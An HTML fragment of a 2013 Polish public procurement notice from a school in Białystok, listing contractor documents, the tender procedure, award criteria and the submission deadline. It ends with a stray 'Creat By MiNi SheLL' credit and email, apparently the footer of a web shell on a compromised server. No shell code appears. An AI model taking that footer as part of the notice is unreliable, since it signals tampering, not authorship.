<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsi1.internetdsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Integracyjnych Nr 1 im. Jana Pawła II w Białymstoku
ul. Łagodna 10
15 - 757 Białystok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.07.2013 godzina 09:00, miejsce: Zespół Szkół Integracyjnych Nr 1 im. Jana Pawła II w Białymstoku
ul. Łagodna 10
15 - 757 Białystok
Sekretariat szkoły.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com